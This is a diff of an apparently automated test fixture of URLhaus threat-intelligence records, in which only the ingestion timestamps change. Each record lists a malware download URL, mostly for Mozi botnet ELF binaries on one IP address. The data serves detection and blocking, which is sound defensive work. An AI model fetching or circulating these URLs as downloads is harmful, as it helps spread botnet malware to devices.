@@ -12838,7 +12838,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026415700Z", + "ingested": "2021-12-14T14:56:15.726492800Z", "original": "{\"id\":\"961282\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961282/\",\"url\":\"http://89.160.20.156:43673/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12887,7 +12887,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026422500Z", + "ingested": "2021-12-14T14:56:15.726493224Z", "original": "{\"id\":\"961283\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961283/\",\"url\":\"http://89.160.20.156:55726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12936,7 +12936,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026429400Z", + "ingested": "2021-12-14T14:56:15.726493590Z", "original": "{\"id\":\"961284\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961284/\",\"url\":\"http://89.160.20.156:59668/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -12985,7 +12985,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026436300Z", + "ingested": "2021-12-14T14:56:15.726493938Z", "original": "{\"id\":\"961278\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961278/\",\"url\":\"http://89.160.20.156:34391/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13034,7 +13034,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026443400Z", + "ingested": "2021-12-14T14:56:15.726494297Z", "original": "{\"id\":\"961277\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961277/\",\"url\":\"http://89.160.20.156:49478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13083,7 +13083,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026450300Z", + "ingested": "2021-12-14T14:56:15.726494802Z", "original": "{\"id\":\"961276\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961276/\",\"url\":\"http://89.160.20.156:54670/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -13132,7 +13132,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026457200Z", + "ingested": "2021-12-14T14:56:15.726495161Z", "original": "{\"id\":\"961270\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961270/\",\"url\":\"http://89.160.20.156:59599/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13181,7 +13181,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026464100Z", + "ingested": "2021-12-14T14:56:15.726495516Z", "original": "{\"id\":\"961271\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961271/\",\"url\":\"http://89.160.20.156:45189/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13230,7 +13230,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026471100Z", + "ingested": "2021-12-14T14:56:15.726495864Z", "original": "{\"id\":\"961272\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961272/\",\"url\":\"http://89.160.20.156:60805/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -13279,7 +13279,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026478Z", + "ingested": "2021-12-14T14:56:15.726496587Z", "original": "{\"id\":\"961273\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961273/\",\"url\":\"http://89.160.20.156:38888/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13328,7 +13328,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026484900Z", + "ingested": "2021-12-14T14:56:15.726497102Z", "original": "{\"id\":\"961274\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961274/\",\"url\":\"http://89.160.20.156:47869/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13377,7 +13377,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026491900Z", + "ingested": "2021-12-14T14:56:15.726497461Z", "original": "{\"id\":\"961275\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961275/\",\"url\":\"http://89.160.20.156:57478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -13427,7 +13427,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026498800Z", + "ingested": "2021-12-14T14:56:15.726497832Z", "original": "{\"id\":\"961269\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961269/\",\"url\":\"http://89.160.20.156:40256/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -13476,7 +13476,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026505700Z", + "ingested": "2021-12-14T14:56:15.726498187Z", "original": "{\"id\":\"961268\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961268/\",\"url\":\"http://89.160.20.156:49035/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13525,7 +13525,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026512800Z", + "ingested": "2021-12-14T14:56:15.726498647Z", "original": "{\"id\":\"961266\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961266/\",\"url\":\"http://89.160.20.156:41531/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -13574,7 +13574,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026519800Z", + "ingested": "2021-12-14T14:56:15.726499003Z", "original": "{\"id\":\"961267\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961267/\",\"url\":\"http://89.160.20.156:49596/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13623,7 +13623,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026526700Z", + "ingested": "2021-12-14T14:56:15.726499354Z", "original": "{\"id\":\"961265\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961265/\",\"url\":\"http://89.160.20.156:43584/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13672,7 +13672,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026533500Z", + "ingested": "2021-12-14T14:56:15.726499765Z", "original": "{\"id\":\"961264\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961264/\",\"url\":\"http://89.160.20.156:44976/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -13721,7 +13721,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026540500Z", + "ingested": "2021-12-14T14:56:15.726500198Z", "original": "{\"id\":\"961259\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961259/\",\"url\":\"http://89.160.20.156:51107/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13770,7 +13770,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026547400Z", + "ingested": "2021-12-14T14:56:15.726500633Z", "original": "{\"id\":\"961260\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961260/\",\"url\":\"http://89.160.20.156:33790/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13819,7 +13819,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026554300Z", + "ingested": "2021-12-14T14:56:15.726500991Z", "original": "{\"id\":\"961261\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961261/\",\"url\":\"http://89.160.20.156:58919/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -13868,7 +13868,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026561200Z", + "ingested": "2021-12-14T14:56:15.726501349Z", "original": "{\"id\":\"961262\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961262/\",\"url\":\"http://89.160.20.156:40395/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13917,7 +13917,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026568100Z", + "ingested": "2021-12-14T14:56:15.726501708Z", "original": "{\"id\":\"961263\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961263/\",\"url\":\"http://89.160.20.156:53510/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13966,7 +13966,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026575Z", + "ingested": "2021-12-14T14:56:15.726502268Z", "original": "{\"id\":\"961258\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961258/\",\"url\":\"http://89.160.20.156:39115/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -14015,7 +14015,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026582Z", + "ingested": "2021-12-14T14:56:15.726502624Z", "original": "{\"id\":\"961257\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961257/\",\"url\":\"http://89.160.20.156:40713/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14064,7 +14064,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026588700Z", + "ingested": "2021-12-14T14:56:15.726502988Z", "original": "{\"id\":\"961256\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961256/\",\"url\":\"http://89.160.20.156:54811/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14113,7 +14113,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026595700Z", + "ingested": "2021-12-14T14:56:15.726503354Z", "original": "{\"id\":\"961255\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961255/\",\"url\":\"http://89.160.20.156:58269/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -14162,7 +14162,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026602600Z", + "ingested": "2021-12-14T14:56:15.726503709Z", "original": "{\"id\":\"961251\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961251/\",\"url\":\"http://89.160.20.156:47985/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14211,7 +14211,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026609500Z", + "ingested": "2021-12-14T14:56:15.726504085Z", "original": "{\"id\":\"961252\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961252/\",\"url\":\"http://89.160.20.156:38107/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14260,7 +14260,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026616400Z", + "ingested": "2021-12-14T14:56:15.726504446Z", "original": "{\"id\":\"961253\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961253/\",\"url\":\"http://89.160.20.156:50354/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -14309,7 +14309,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026623400Z", + "ingested": "2021-12-14T14:56:15.726504799Z", "original": "{\"id\":\"961254\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961254/\",\"url\":\"http://89.160.20.156:44987/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14358,7 +14358,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026630200Z", + "ingested": "2021-12-14T14:56:15.726505163Z", "original": "{\"id\":\"961249\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961249/\",\"url\":\"http://89.160.20.156:44681/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14407,7 +14407,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026637200Z", + "ingested": "2021-12-14T14:56:15.726505836Z", "original": "{\"id\":\"961250\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961250/\",\"url\":\"http://89.160.20.156:58391/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -14456,7 +14456,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026644100Z", + "ingested": "2021-12-14T14:56:15.726506240Z", "original": "{\"id\":\"961248\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961248/\",\"url\":\"http://89.160.20.156:48540/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14505,7 +14505,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026651100Z", + "ingested": "2021-12-14T14:56:15.726506601Z", "original": "{\"id\":\"961246\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961246/\",\"url\":\"http://89.160.20.156:42755/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14554,7 +14554,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026658100Z", + "ingested": "2021-12-14T14:56:15.726506972Z", "original": "{\"id\":\"961247\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961247/\",\"url\":\"http://89.160.20.156:52688/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -14603,7 +14603,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026665Z", + "ingested": "2021-12-14T14:56:15.726507326Z", "original": "{\"id\":\"961244\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961244/\",\"url\":\"http://89.160.20.156:33782/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14652,7 +14652,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026673900Z", + "ingested": "2021-12-14T14:56:15.726507683Z", "original": "{\"id\":\"961245\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961245/\",\"url\":\"http://89.160.20.156:50381/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14701,7 +14701,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026681Z", + "ingested": "2021-12-14T14:56:15.726508040Z", "original": "{\"id\":\"961243\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961243/\",\"url\":\"http://89.160.20.156:44219/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -14751,7 +14751,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026688Z", + "ingested": "2021-12-14T14:56:15.726508402Z", "original": "{\"id\":\"961242\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961242/\",\"url\":\"http://89.160.20.156:36619/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:01:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -14800,7 +14800,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026695Z", + "ingested": "2021-12-14T14:56:15.726508753Z", "original": "{\"id\":\"961241\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961241/\",\"url\":\"http://89.160.20.156:59976/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:56:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -14849,7 +14849,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026701900Z", + "ingested": "2021-12-14T14:56:15.726509146Z", "original": "{\"id\":\"961239\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961239/\",\"url\":\"http://89.160.20.156:48688/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -14898,7 +14898,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026708700Z", + "ingested": "2021-12-14T14:56:15.726509553Z", "original": "{\"id\":\"961240\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961240/\",\"url\":\"http://89.160.20.156:45682/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14947,7 +14947,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026715600Z", + "ingested": "2021-12-14T14:56:15.726509905Z", "original": "{\"id\":\"961238\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961238/\",\"url\":\"http://89.160.20.156:34922/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14996,7 +14996,7 